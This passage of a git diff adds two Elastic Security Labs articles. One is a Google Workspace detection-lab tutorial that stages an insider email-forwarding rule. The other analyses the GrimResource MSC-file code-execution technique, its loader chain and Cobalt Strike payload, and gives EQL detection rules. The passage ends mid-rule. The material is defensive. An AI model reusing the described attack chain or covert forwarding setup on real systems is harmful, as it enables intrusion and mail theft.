starting point.\n\nIn this article, we will focus specifically on the security solution which includes a robust detection engine and 600+ pre-built threat [detection rules,](https://github.com/elastic/detection-rules/tree/main/rules) an endpoint agent that can be deployed to Windows, Linux, or macOS endpoints and collect data from various on-premise and cloud environments, as well as detect and prevent threats in real-time. Not to mention, this endpoint behavior logic is also all public in our [protections artifacts](https://github.com/elastic/protections-artifacts) repository.\n\nOur endpoint agent orchestrator, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html), is manageable from the Kibana interface in the Elastic Stack. Fleet allows us to set up and deploy security policies to our endpoint agents. These policies are extremely customizable, thanks to an extensive list of supported [Integrations](https://www.elastic.co/integrations/).\n\nThink of an Integration as a module for the Elastic Agent that provides processors to collect specific data. When added to our security policy, an Integration allows the Elastic Agent to ingest logs, apply our Elastic Common Schema (ECS), and store them in the Elastic Stack for searching or to trigger alerts. If you're curious about a specific integration Elastic has, you can search for it [here](https://www.elastic.co/integrations/data-integrations)!\n\nWith this information you could almost assume the Elastic Stack allows you to manage all of this with just one information technology (IT) guy.\n\n\n\nEither way, our goal is to create a threat detection lab for [Google Workspace](https://docs.elastic.co/en/integrations/google_workspace) as depicted in this diagram:\n\n\n\nThe process of setting this up is pretty straightforward. Note that your environment does not have to be cloud-focused; if you prefer to do everything locally, you are more than welcome to. The [Elastic Container Project](https://www.elastic.co/security-labs/the-elastic-container-project) is a great resource for a local Docker build of the stack.\n\n## Sign-Up for Google Workspace\n\nIn order for you to use GW, you must have a registered Google account email address and organization. If you already have a GW setup for an organization, login to the [admin console](https://admin.google.com/) and continue to Create a Project in Google Cloud. This process will not go into detail about creating a Google account.\n\nOnce created, do the following:\n\n1. Visit [https://workspace.google.com](https://workspace.google.com) \\> Get Started\n2. Fill out the information requested in subsequent steps\n3. Business name: DeJesus’ Archeology\n4. Number of employees: 2-9\n5. Region: United States\n\nFor this lab, we will use DeJesus’ Archeology as a business name because it's memorable (also who didn't want to be an archeologist growing up?). We'll be digging up more recent evidence in these logs than we would from the earth, of course.\n\nEventually you will be asked, “Does your business have a domain?”. GW requires you to have your own domain name to use its services, especially the admin console for an organization. For today, we will select “No, I need one” and will use dejesusarcheology.com, but please select or use your own. From here, you will need to enter additional business information to register your domain and organization.\n\nYou will need a username to sign into your GW account and create your business email address. We'll use [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) as the administrative email. When finished, continue to login to your GW admin console with your new email where you should be greeted by a similar interface below.\n\n\n\n## Setup Google Cloud Platform (GCP)\n\nFor the Elastic agent to ingest GW logs, it relies solely on making requests to the [Reports API](https://developers.google.com/admin-sdk/reports/reference/rest) and therefore, we need to leverage GCP for a managed service account. This service account’s credentials will be used by our Elastic agent to then leverage the admin SDK API for pulling logs from GW’s Reports API into the Elastic Stack. Domain-wide delegation and OAuth2 are important for authentication and resource access but will be enabled through steps later on.\n\n### Create a Project\n\nGCP is hierarchical, so we must first create a project. If you already have a GCP environment setup, we recommend creating a new project that links to your GW via the registered domain by following similar steps below.\n\nComplete the following steps:\n\n1. Log into [Google Cloud](https://console.cloud.google.com/)with the same Google account used to setup GW\n2. Select the following: Select a project \\> New Project\n3. Enter the following information described in subsequent steps\n4. Project name: dejesus-archeology\n5. Organization: dejesusarcheology.com\n6. Location: dejesusarcheology.com\n\nWhen done, you should have a new organization and project in GCP. By default, only the creator of the project has rights to manage the project.\n\n\n\n### Enable Admin SDK API\n\nOur Elastic agent will eventually use our GCP service account, which uses the [Workspace Admin SDK](https://developers.google.com/admin-sdk) to interact with the GW admin console REST API, therefore it needs to be enabled in GCP. To keep your mind at ease, we will only be enabling read access to the Reports API for this admin SDK.\n\nComplete the following steps:\n\n- Select the Google Cloud navigation menu \\> APIs & Services \\> Enabled APIs & Services\n- Search and enable “Admin SDK API” from the API library page\n\nWhen finished, you will have enabled the Admin SDK API within your project, where your service account will have access to pull data from GW.\n\n\n\n### Configure OAuth Consent Screen\n\nWe next need to set up the [OAuth consent screen](https://developers.google.com/workspace/guides/configure-oauth-consent) for our service account and application when they create API requests to GW, as it will include the necessary authorization token.\n\nComplete the following steps:\n\n1. Select the Google Cloud navigation menu \\> APIs & Services \\> Enabled APIs & Services \\> OAuth Consent Screen\n2. User Type \\> Internal \\> Create\n3. Fill out the following information in subsequent steps\n4. App name: elastic-agent\n5. User support email: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com)\n6. Authorized domains: dejesusarcheology.com\n7. Developer contact information: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com)\n8. Save and Continue\n9. Save and Continue\n10. Back to Dashboard\n\n\n\nWhen finished, we will now have a registered application using OAuth 2.0 for authorization and the consent screen information set. Please note, the default token request limit for this app daily is 10,000 but can be increased. We recommend setting your Elastic agent’s pull rate to every 10 minutes which should not come close to this reaching this threshold. Setting the agent’s pull rate will be done at a later step.\n\n### Create a Service Account\n\nFor the Elastic agent to ingest data from GW, we will need to create a [service account](https://cloud.google.com/iam/docs/service-accounts) for the agent to use. This account is meant for non-human applications, allowing it to access resources in GW via the Admin SDK API we enabled earlier.\n\nTo create a service account, do the following:\n\n1. Select the navigation menu in Google Cloud \\> APIs & Services \\> Credentials \\> Create Credentials \\> Service Account\n2. Enter the following information:\n3. Service account name: elastic-agent\n4. Service account ID: elastic-agent\n5. Leave the rest blank and continue\n6. Select your new Service Account \\> Keys \\> Add Key \\> Create New Key \\> JSON\n\nBy default, the Owner role will be applied to this service account based on inheritance from the project, feel free to scope permissions tighter as best seen fit. When finished, you should have a service account named elastic-agent, credentials for this service account in a JSON file saved to your host. We will enter this information during our Fleet policy integration setup.\n\n\n\n### Enable Domain-Wide Delegation\n\nOur service account will need [domain-wide delegation](https://developers.google.com/admin-sdk/directory/v1/guides/delegation) of permissions to access APIs that reach outside of GCP and into GW. The important data necessary for this has already been established in earlier steps where we need an API key, service account and OAuth client ID.\n\nTo enable domain-wide delegation for your service account, do the following:\n\n1. In your GW Admin Console select \\> Navigation Menu \\> Security \\> Access and data control \\> API controls\n2. Select Manage Domain Wide Delegation \\> Add New\n3. Client ID: OAuth ID from Service Account in GCP\n4. Google Cloud Console \\> IAM & Admin \\> Service Accounts \\> OAuth 2 Client ID (copy to clipboard)\n5. OAuth Scopes: [https://www.googleapis.com/auth/admin.reports.audit.readonly](https://www.googleapis.com/auth/admin.reports.audit.readonly)\n\n\n\nOur service account in GCP only needs access to admin.reports.audit.readonly to access GW [Audit Reports](https://developers.google.com/admin-sdk/reports/v1/get-start/overview) where these are converted into ECS documents for our Elastic Stack.\n\nIf you made it this far, CONGRATULATIONS you are doing outstanding! Your GW and GCP environments are now set up and finished. At this point you are almost done, we just need to set up the Elastic Stack.\n\n## Setting Up Your Free Cloud Stack\n\nFor this lab, we will use a [free trial](https://cloud.elastic.co/registration)of cloud elastic with your preference of a Google or Microsoft email account. You also have the option to create the stack in [Amazon Web Services](https://www.elastic.co/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&utm_content=Elasticsearch-AWS&utm_source=adwords-s&utm_medium=paid&device=c&utm_term=amazon%20elk&gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB) (AWS), [GCP](https://www.elastic.co/guide/en/cloud/current/ec-billing-gcp.html) or [Microsoft Azure](https://www.elastic.co/partners/microsoft-azure) if you’d like to stand up your stack in an existing Cloud Service Provider (CSP). The free trial will deploy the stack to GCP.\n\nOnce registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment gw-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:\n\n- Name: gw-threat-detection\n- Cloud provider: Google Cloud\n- Region: Iowa (us-central1)\n- Hardware profile: Storage optimized\n- Version: 8.4.1 (latest)\n\nOnce set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP where your deployment credentials will be displayed. You can download these credentials as a CSV file or save them wherever you best see fit, but they are crucial to logging into your deployed stack. The deployment takes approximately ~5 minutes to complete and once finished you can select “continue” to login. Congratulations, you have successfully deployed the Elastic Stack within minutes!\n\n\n\n## Setup Fleet from the Security Solution\n\nAs a reminder, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) enables the creation of a security policy, which can incorporate the [GW integration](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html)on an elastic-agent, in order to access and ingest GW logs into our stack.\n\n### Create a Google Workspace Policy\n\nIn order for our Elastic Agent to know which integration it is using, what data to gather and where to stream that data within our stack, we must first set up a custom Fleet policy, named Google Workspace.\n\nTo setup a fleet policy within your Elastic Stack, do the following in your Elastic Stack:\n\n- Navigation menu \\> Management \\> Fleet \\> Agent Policies \\> Create agent policy\n- Enter “Google Workspace” as a name \\> Create Agent Policy\n\n\n\n### Install the Elastic agent on an Endpoint\n\nAs previously mentioned, we have to install at least one agent on an endpoint to access data in GW, and will be subject to the deployed GW policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP to keep everything in the same environment. I will be using a VM instance of [Ubuntu 20.04 LTS](https://releases.ubuntu.com/focal/) VM in Google’s Compute Engine (GCE) of the same GCP project we have been working on. Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic agent.\n\nAfter your endpoint is setup, do the following in your Elastic Stack to deploy your the agent:\n\n1. Navigation menu \\> Management \\> Fleet \\> Agents \\> Add Agent\n2. Ensure the GW policy is selected\n3. Select the appropriate OS\n4. Select the clipboard icon to copy the commands\n5. Run the commands on your endpoint to install the agent\n6. Once finished, Fleet should show a checkmark and state 1 agent has been enrolled and Incoming data confirmed\n\n\n\n### Assign Google Workspace Integration to Fleet Policy\n\nWe must add the GW integration to our GW policy in order for it to collect data from GW and stream it to our Elastic Stack. We will configure the GW integration settings to have information created when we set up our GW environment to avoid having [unsecured credentials](https://attack.mitre.org/techniques/T1552/) on our Ubuntu host.\n\n⚠️ The GW integration has a default interval of 2 hours, meaning the Elastic agent will retrieve data every 2 hours due to potential [data retention and lag times](https://support.google.com/a/answer/7061566?hl=en). This should be adjusted in the integration itself and is accounted for in the following steps within your Elastic Stack:\n\n1. Navigation menu \\> Fleet \\> Agent Policies \\> Google Workspace \\> Add Integration\n2. Search for “Google Workspace” \\> Select Google Workspace\n3. Select “Add Google Workspace”\n4. Enter the following information for this integration:\n5. Integration name: google workspace\n6. Jwt File: Copy contents of JSON file from service account creation steps\n7. Delegated Account: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) (Use your own)\n8. Interval: 10m\n9. Agent policy: Google Workspace\n10. Select “Save and Continue”\n11. Select “Save and deploy changes”\n\nOnce completed, your GW integration should be assigned to your GW policy with one agent assigned this policy.\n\n\n\nTo recap on our Elastic Stack setup so far we have completed the following:\n\n- Deployed an Elastic Stack\n- Created a Fleet policy\n- Setup a lightweight Linux endpoint\n- Deployed an Elastic agent to the Linux endpoint\n- Enabled the Google Workspace integration inside our Fleet policy\n\n### Assign Google Workspace Integration to Fleet Policy\n\nRather than rely on the detection engineering (DE) higher powers, let’s take a second to actually confirm GW data is being ingested into our stack as expected at this point. We can rely on the Discovery feature of the Elastic Stack which allows us to search specific criteria across existing ECS documents. For this, we will use the filter criteria `data_stream.dataset : \"google_workspace.*\"` to look for any ECS documents that originate from a Google Workspace datastream.\n\n\n\nIf you do not have any results, generate some activity within your GW such as creating new users, enabling email routes, creating new Organizational Units (OU) and so forth, then refresh this query after the 10 minute window has surpassed.\n\n\n\nIf results are found, congratulations are in order because you now have a fully functional threat detection lab for Google Workspace with the Elastic Security for SIEM!\n\n## Enable Google Workspace Detection Rules\n\nAs stated earlier, Elastic has 600+ pre-built detection [rules](https://github.com/elastic/detection-rules/tree/main/rules/integrations/google_workspace) not only for Windows, Linux and MacOS endpoints, as well as several integrations including GW. You can view our current existing GW rules and MITRE ATT&CK [coverage](https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-google_workspaceWILDCARD.json&leave_site_dialog=false&tabs=false).\n\nTo enable GW rules, complete the following in the Elastic Stack:\n\n1. Navigation menu \\> Security \\> Manage \\> Rules\n2. Select “Load Elastic prebuilt rules and timeline templates”\n3. Once all rules are loaded:\n4. Select “Tags” dropdown\n5. Search “Google Workspace”\n6. Select all rules \\> Build actions dropdown \\> Enable\n\n\n\nWhile we won’t go in-depth about exploring all rule information, we recommend doing so. Elastic has some additional information such as related integrations, investigation guides and more! Also, you can contribute back to the community by [creating your own detection rule](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) with the “Create new rule” button, and [contribute](https://github.com/elastic/detection-rules#how-to-contribute) to our detection rules repository.\n\n## Let’s Trigger a Pre-Built Rule\n\nFor this example, we will provoke the [Google Workspace Custom Admin Role Created](https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml) detection rule. In our GW admin console, visit Account \\> Admin roles and create a new role with the following information:\n\n1. Name: Curator\n2. Description: Your Choice\n3. Admin console privileges:\n4. Alert Center: Full Access\n\n\n\nNow, we aren’t entirely sure why the Curator role would have access to our Alert Center, but the role seems either improperly scoped or someone wants to have the ability to potentially silence some alerts before our security team can investigate them. While the creation of administrative accounts ([T1136.003](https://attack.mitre.org/techniques/T1136/003/)) is not unusual, they should always be investigated if unexpected to ensure cloud roles ([T1098.003](https://attack.mitre.org/techniques/T1098/003/)) are properly scoped.\n\nTo view our detection alert, in your Elastic Stack, visit Navigation Menu \\> Security \\> Alerts and the following should show your alerts. From this, we can see that our rule triggered as well as [Google Workspace API Access Granted via Domain-Wide Delegation of Authority](https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.toml).\n\n\n\nIf we select “View details” from the actions column, we receive a pop-out panel showing the alert overview, tabled data fields and values from our ECS document, as well as the raw JSON.\n\n\n\nMost detection rules for GW can be developed with a few consistent fields such as those we describe in our [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html), making new rules easier to create. If you would like to view all data fields for GW that the ECS schema contains, you can find that information [here](https://www.elastic.co/guide/en/beats/filebeat/current/exported-fields-google_workspace.html).\n\n## Let’s Trigger a Custom Rule\n\nWhile pre-built detection rules are great for having threat coverage during onboarding, maybe you would like to search your data and create a new custom rule tailored to your environment.\n\nSince the Elastic Stack is bundled with additional searching capabilities, we can rely on the Analytics [Discover](https://www.elastic.co/guide/en/kibana/current/discover.html) feature to start searching through our raw data for GW related documents by visiting Navigation Menu \\> Analytics \\> Discover.\n\nFrom here, we can change our data view to logs-\\* and then do an open-ended KQL query for `event.dataset: google_workspace*` which will return all documents where the source is from GW. You can then either start tabling the data based on available fields or view details about each document.\n\n\n\nThis is important to understand because it influences rule development. Rules are often prototyped as a data reduction exercise, beginning very broad and being refined over time into an effective rule. If you are having difficulty after this exercise with creating detection logic, our [philosophy](https://github.com/elastic/detection-rules/blob/main/PHILOSOPHY.md) on doing so may be of assistance.\n\nFirst, we will add a user, Ray Arnold, to our organization who has administrative access. With our Ray Arnold account, we will generate some suspicious events in GW, such as creating a custom email route for Gmail that forwards email destined to our primary administrator (Terrance), to Ray Arnold. In this scenario we are focused on potential collection of sensitive information via email collection via an email forwarding rule ([T1114.003](https://attack.mitre.org/techniques/T1114/003/))\n\nComplete the following steps:\n\n1. Add Ray Arnold as a user:\n2. Navigate to the users settings in GW\n3. Select “add new user”\n4. First name: Ray\n5. Last name: Arnold\n6. Select “ADD NEW USER”\n7. Add Engineers group and make Ray Arnold the owner:\n8. Navigate to groups settings in GW\n\nYou can configure the following settings like these examples:\n\n1. Group name: Engineers\n2. Group email: [engineering@dejesusarcheology.com](mailto:engineering@dejesusarcheology.com)\n3. Group Description: Engineering group at dinosaur park who are responsible for technology and feeding velociraptors.\n4. Group owners: [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com)\n5. Labels: Mailing and Security\n6. Who can join the group: Only invited users\n7. Select “Create Group”\n\nNow we assign admin roles and privileges to Ray Arnold: 1. Navigate to Ray Arnold’s user account 2. Select “Admin roles and privileges” \\> Assign Roles 3. Super Admin -\\> Assigned 4. Groups Admin -\\> Assigned 5. Services Admin -\\> Assigned 6. Select “Save”\n\n\n\nIf done correctly, Ray Arnold should be a new user in GW for the DeJesus’ Archeology organization. He is also the owner of the Engineers group and has Super Admin, Groups Admin and Services Admin roles assigned to his account. Following this, we need to login to the GW admin console with Ray Arnold’s account and add a custom email route.\n\nThis provides our organization with an insider threat scenario. Ray Arnold was hired as an employee with authorization and authentication to GW admin console settings. Our organization trusts that Ray Arnold will receive compensation for the requirements agreed to during the hiring process. Risk-mitigation is then up to the administrator when scoping the proper permissions and roles applied to Ray Arnold.\n\n\n\nComplete the following:\n\n1. Login to the admin console with Ray Arnold’s account\n2. Select Navigation Menu \\> Apps \\> Google Workspace \\> Gmail \\> Routing\n3. Select Configure for “Routing”\n4. Enter the following information\n5. Description: Default administrator spam filtering\n6. Email messages to affect: Inbound, Outbound, Internal - Sending, Internal - Receiving\n7. Also deliver to: [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com)\n8. Account types to affect: Users\n9. Envelope filter: Only affect specific envelope recipients (Email address: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com))\n\nNow we can test our custom email route by sending [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) an email from a separate email (We created a random email account with Proton), that is private and discusses private details about new Paleo-DNA. Once you send an email, you can view Ray Arnold’s Gmail and see that this private email was additionally routed to [ray@dejesusarcheology.com](mailto:ray@dejesusarcheology.com), where we now have an existing insider threat potentially selling private information about our Paleo-DNA tests to competitors. This we cannot allow!\n\n\n\n### Identify a Potential Detection Rule for Custom Gmail Routes\n\nLuckily, we have the Elastic Stack on our side to help us thwart this potential insider threat by detecting custom Gmail route creations! Within your Elastic Stack, visit Navigation Menu \\> Analytics \\> Discover and let’s start creating our KQL query. Below are the query filters we should be looking for and the final query.\n\nKQL query:`event.dataset: google_workspace.admin and event.action: \"CREATE_GMAIL_SETTING\" and not related.user: terrance and google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)`\n\nLet’s break this down further to explain what we are looking for:\n\n`event.dataset: google_workspace.admin` - Documents in ECS where the data sourced from GW, specifically admin reporting. Since a user needs to be an administrator, we should expect data to source from admin reporting, which may also indicate a compromised admin account or abuse of an admin not setup with principle of least-privilege (PoLP).\n\n`event.action: \"CREATE_GMAIL_SETTING\"` - The creation of a Gmail setting which is typically done by administrators.\n\n`not related.user: terrance` - So far, any creation of a Gmail setting by an administrator whose username is not “terrance” who is the only administrator that is expected to be touching such settings.\n\n`google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)` - This setting name is specific to Gmail routing rules.\n\nPlugging this query into Discover, we have matching documents for this activity being reported in GW!\n\n\n\n### Create a Custom Rule in the Security Feature\n\nLet’s wrap this up by adding our custom detection rule for this!\n\nTo add your custom rule, complete the following:\n\n1. In your Elastic Stack, select Navigation menu \\> Security \\> Manage \\> Rules\n2. Select “Create new rule”\n3. Enter the following information:\n4. Define rule: Source, Index Patterns: logs-google_workspace\\*\n5. Custom query: Our custom query\n\nAnd we define rule metadata:\n\n1. Name: Google Workspace Custom Forwarding Email Route Created\n2. Description: Your choice\n3. Default severity: High\n4. Tags: Google Workspace\n\nWhat is fantastic about this custom rule is we can send a notification via our platform of choice so we are notified immediately when this alert is triggered.\n\n\n\nThen select “Create & enable rule” at the bottom to create your custom rule. If we replay the steps above to create a custom Gmail forwarding rule, we will now see an alert and receive a notification about the alert trigger!\n\n\n\nAt this point, we are now aware that Ray Arnold has created a custom Gmail route rule in GW with no authorization. From our alert in the Elastic Stack and notification to the CEO, we can now take action to mitigate further risk.\n\n## Takeaways\n\nAs demonstrated, Elastic’s security solution and the Elastic Stack allow us to ingest GW reporting logs and scan this data with pre-built detection rules or custom rules. Combine this with other features of the stack such as [Enterprise Search](https://www.elastic.co/enterprise-search), [Observability](https://www.elastic.co/observability), and a very simple cloud stack deployment process and we can start detecting threats in our GW environment in no time.\n\nIt’s been quite a journey and you have accomplished an incredible amount of work. In part three of this series: Detecting Common Threats, we will emulate some common Google Workspace abuse by threat actors and create more advanced detection logic for these. Hold on tight, because it's about to get WILD.\n\nAlso, there is still so much more to explore within the Elastic Stack, as you have probably already found during this lab, so feel free to explore! Elastic continues to take action on security transparency as [recently](https://www.elastic.co/blog/continued-leadership-in-open-and-transparent-security) discussed.\n\nHopefully this provides you with a better understanding of the powerful capabilities within the Elastic Stack and how to use it to detect potential threats in GW. Thanks for reading/following along and may we all be in the capable hands of detection engineers in part three.\n"
+ },
+ "title": "Google Workspace Attack Surface",
+ "slug": "google-workspace-attack-surface-part-two",
+ "subtitle": "Part Two: Setup Threat Detection With Elastic",
+ "date": "2023-01-03",
+ "description": "During part two of this multipart series, we’ll help you understand how to setup a GW lab for threat detection and research.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-01-e.jpg",
+ "category": null,
+ "tags": [
+ "threat detection",
+ "cloud security",
+ "google workspace",
+ "google cloud"
+ ]
+ },
+ "id": "security_labs_content-google_workspace_attack_surface_part_two-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-grimresource-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-grimresource-md.json
new file mode 100644
index 00000000000..e8f7cf0e560
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-grimresource-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"GrimResource - Microsoft Management Console for initial access and evasion\"\nslug: \"grimresource\"\ndate: \"2024-06-22\"\nsubtitle: \"Adversaries adapting to Microsoft's new security landscape\"\ndescription: \"Elastic researchers uncovered a new technique, GrimResource, which allows full code execution via specially crafted MSC files. It underscores a trend of well-resourced attackers favoring innovative initial access methods to evade defenses.\"\nauthor:\n - slug: joe-desimone\n - slug: samir-bousseaden\nimage: \"grimresource.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - grimresource\n - mcc\n - msc\n---\n\n## Overview\n\nAfter Microsoft [disabled](https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked) office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity. However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Mature attackers seek to leverage new and undisclosed infection vectors to gain access while evading defenses. A [recent example](https://www.genians.co.kr/blog/threat_intelligence/facebook) involved DPRK actors using a new command execution technique in MSC files.\n\nElastic researchers have uncovered a new infection technique also leveraging MSC files, which we refer to as GrimResource. It allows attackers to gain full code execution in the context of `mmc.exe` after a user clicks on a specially crafted MSC file. A [sample](https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb) leveraging GrimResource was first uploaded to VirusTotal on June 6th.\n\n## Key takeaways\n\n* Elastic Security researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource\n* GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (`mmc.exe`) with minimal security warnings, ideal for gaining initial access and evading defenses\n* Elastic is providing analysis of the technique and detection guidance so the community can protect themselves \n\n## Analysis\n\nThe key to the [GrimResource](https://gist.github.com/joe-desimone/2b0bbee382c9bdfcac53f2349a379fa4) technique is using an old [XSS flaw](https://medium.com/@knownsec404team/from-http-domain-to-res-domain-xss-by-using-ie-adobes-pdf-activex-plugin-ba4f082c8199) present in the `apds.dll` library. By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary javascript in the context of `mmc.exe`. Attackers can combine this technique with [DotNetToJScript](https://github.com/tyranid/DotNetToJScript/tree/master) to gain arbitrary code execution.\n\n\n\nAt the time of writing, the sample identified in the wild had 0 static detections in [VirusTotal](https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb/details).\n\n\n\nThe sample begins with a transformNode obfuscation technique, which was observed in recent but unrelated [macro samples](https://twitter.com/decalage2/status/1773114380013461799). This aids in evading ActiveX security warnings.\n\n\n\nThis leads to an obfuscated embedded VBScript, as reconstructed below:\n\n\n\nThe VBScript sets the target payload in a series of environment variables and then leverages the [DotNetToJs](https://github.com/tyranid/DotNetToJScript/blob/master/DotNetToJScript/Resources/vbs_template.txt) technique to execute an embedded .NET loader. We named this component PASTALOADER and may release additional analysis on this specific tool in the future.\n\n\n\n\n\nPASTALOADER retrieves the payload from environment variables set by the VBScript in the previous step:\n\n\n\nFinally, PASTALOADER spawns a new instance of `dllhost.exe` and injects the payload into it. This is done in a deliberately stealthy manner using the [DirtyCLR](https://github.com/ipSlav/DirtyCLR/tree/7b1280fee780413d43adbad9f4c2a9ce7ed9f29e) technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.\n\n\n\n## Detections\n\nIn this section, we will examine current behavior detections for this sample and present new, more precise ones aimed at the technique primitives.\n\n### Suspicious Execution via Microsoft Common Console\n\nThis detection was established prior to our discovery of this new execution technique. It was originally designed to identify a [different method](https://www.genians.co.kr/blog/threat_intelligence/facebook) (which requires the user to click on the Taskpad after opening the MSC file) that exploits the same MSC file type to execute commands through the Console Taskpads command line attribute:\n\n\n\n```\nprocess where event.action == \"start\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and process.parent.args : \"*.msc\" and\n not process.parent.args : (\"?:\\\\Windows\\\\System32\\\\*.msc\", \"?:\\\\Windows\\\\SysWOW64\\\\*.msc\", \"?:\\\\Program files\\\\*.msc\", \"?:\\\\Program Files (x86)\\\\*.msc\") and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\")\n```\nIt triggers here because this sample opted to spawn and inject a sacrificial instance of dllhost.exe:\n\n\n\n### .NET COM object created in non-standard Windows Script Interpreter\n\nThe sample is using the [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) technique, which triggers another detection looking for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine (Jscript or Vbscript):\n\nThe following EQL rule will detect execution via the .NET loader:\n\n```\napi where\n not process.name : (\"cscript.exe\", \"wscript.exe\") and\n process.code_signature.trusted == true and\n process.code_signature.subject_name : \"Microsoft*\" and\n process.Ext.api.name == \"VirtualAlloc\" and\n process.Ext.api.parameters.allocation_type == \"RESERVE\" and \n process.Ext.api.parameters.protection == \"RWX\" and\n process.thread.Ext.call_stack_summary : (\n /* .NET is allocating executable memory on behalf of a WSH script engine\n * Note - this covers both .NET 2 and .NET 4 framework variants */\n \"*|mscoree.dll|combase.dll|jscript.dll|*\",\n \"*|mscoree.dll|combase.dll|vbscript.dll|*\",\n \"*|mscoree.dll|combase.dll|jscript9.dll|*\",\n \"*|mscoree.dll|combase.dll|chakra.dll|*\"\n)\n```\n\nThe following alert shows `mmc.exe` allocating RWX memory and the `process.thread.Ext.call_stack_summary `captures the origin of the allocation from `vbscript.dll` to `clr.dll` : \n\n\n\n### Script Execution via MMC Console File \n\nThe two previous detections were triggered by specific implementation choices to weaponize the GrimResource method (DotNetToJS and spawning a child process). These detections can be bypassed by using more OPSEC-safe alternatives.\n\nOther behaviors that might initially seem suspicious — such as `mmc.exe` loading `jscript.dll`, `vbscript.dll`, and `msxml3.dll` — can be clarified compared to benign data. We can see that, except for `vbscript.dll`, these WSH engines are typically loaded by `mmc.exe`: \n\n\n\nThe core aspect of this method involves using [apds.dll](https://strontic.github.io/xcyclopedia/library/apds.dll-DF461ADCCD541185313F9439313D1EE1.html) to execute Jscript via XSS. This behavior is evident in the mmc.exe Procmon output as a `CreateFile` operation (`apds.dll` is not loaded as a library):\n\n\n\n\n\nWe added the following detection using Elastic Defend file open events where the target file is `apds.dll` and the `process.name` is `mmc.exe`: \n\nThe following EQL rule will detect the execution of a script from the MMC console:\n\n```\nsequence by process.entity_id with maxspan=1m\n [process where event.action == \"start\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and process.args : \"*.msc\"]\n [file where event.action == \"open\" and file.path : \"?:\\\\Windows\\\\System32\\\\apds.dll\"]\n```\n\n\n\n### Windows Script Execution via MMC Console File\n\nAnother detection and forensic artifact is the creation of a temporary HTML file in the INetCache folder, named `redirect[*] `as a result of the APDS [XSS](https://owasp.org/www-community/attacks/xss/) redirection:\n\n\n\nThe following EQL correlation can be used to detect this behavior while also capturing the msc file path: \n\n```\nsequence by process.entity_id with maxspan=1m\n [process where event.action == \"start\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and process.args : \"*.msc\"]\n [file where event.action in (\"creation\", \"overwrite\") and\n process.executable : \"?:\\\\Windows\\\\System32\\\\mmc.exe\" and file.name : \"redirect[?]\" and \n file.path : 